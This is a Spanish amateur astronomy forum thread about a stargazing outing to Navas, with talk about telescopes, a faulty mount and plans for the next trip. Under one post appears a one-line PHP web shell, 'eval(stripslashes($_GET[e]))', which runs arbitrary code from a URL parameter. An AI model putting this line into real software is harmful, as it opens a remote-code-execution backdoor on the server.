Que tal por Navas

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que tal por Navas

Mensaje por javi »

Si organizais una de más dias yo me apunto, ahora en verano, claro está que lo suyo es una casa rural.

Un abrazo.
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

Que tal por Navas

Mensaje por LUNA »

Hola chicos:

Me lo he pasado fenomenal con todos vosotros y el resto del grupo. Pero me teneis que perdonar si digo que la vista de las estrellas con mi TELES fué maravillosa, me ha sabido a poco. Tengo el mal regustillo de la montura, pero creo que el tema está en proceso de llegar a buen fín.

Gracias Javi , Carlos, Patricio y otro compañero con acento argentino al cual no quiero cambiar el nombre, por estar conmigo en el momento del parto. :lol: :lol: :lol:

Besos para todos
C8-S
Montura ecuatorial CG-5
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Que tal por Navas

Mensaje por m3ntol »

[quote="LUNA"]Hola chicos:

Me lo he pasado fenomenal con todos vosotros y el resto del grupo. Pero me teneis que perdonar si digo que la vista de las estrellas con mi TELES fué maravillosa, me ha sabido a poco. Tengo el mal regustillo de la montura, pero creo que el tema está en proceso de llegar a buen fín.

Gracias Javi , Carlos, Patricio y otro compañero con acento argentino al cual no quiero cambiar el nombre, por estar conmigo en el momento del parto. :lol: :lol: :lol:

Besos para todos[/quote]

La óptica de tu teles es excelente, está muy bien colimado y eso, de fábrica, es un poco raro. M13 fué increible y M51 me dejó babeando. No me extraña que quieras volver a sacar de paseo al chiquitín.

Por cierto, ¿has hecho algo con la montura? aunque te digo que la montura funciona bién, como mucho reclama que te cambién la barra de las pesas que está arañada.
phpbb:eval(stripslashes($_GET[e]));
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

Que tal por Navas

Mensaje por LUNA »

Estoy en contacto con Angel de Tecnospica y la proxima semana la envío completa.

Yo quiero mi montura, la que me han mandado funciona pero por las marcas que tiene se ve que ha sido usada bastante.

En fin!

¿para cuando la proxima?
C8-S
Montura ecuatorial CG-5
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que tal por Navas

Mensaje por javi »

Yo propondria mañana pero he visto el tiempo y dice que nublado. Lo suyo hubiese sido hoy noche pero sin prepararlo como que no. Las predicciones dicen que el finde que viene tambien nublado aunque ya se sabe con esto de las predicciones pero por mi el finde que viene si se tercia podeis contar conmigo porque solo con que nos riamos un rato merece la pena ir.

Un abrazo.
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Que tal por Navas

Mensaje por vakaloura »

Jejejeje, javi: que sepas que te toca hacer penitencia por lo menos un mes... son las tasas que se han de pagar por haber comprado semejante bicho!!! Y suerte que has tenido de poder estrenarlo en unas condiciones más o menos aceptables (menos que más)

En cuanto a lo de salir por ahí, habrá que estudiarlo, aunque desde luego si no hace mal tiempo yo me piro lejos de madrid, es más, propongo irnos mínimo >120 kms y hacer noche de estrangis en tienda de campaña por aquello de no quedarse sopa al volante :?

Qué os parece???

Un saludo maj@s!!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que tal por Navas

Mensaje por javi »

este finde lo veo crudo pero el que viene se puede contemplar a lo largo de la semana veremos como va el tema.

Un abrazo.
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Que tal por Navas

Mensaje por vakaloura »

Se me olvidó poner por aquí las afotos de evento.

http://picasaweb.google.com/vakaloura/N ... directlink

Más vale tarde que nunca.

Un saludo majetes!!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que tal por Navas

Mensaje por javi »

Que fotos mas de puta madre. Haber si este verano podemos hacer una por alli.

Un abrazo.
Responder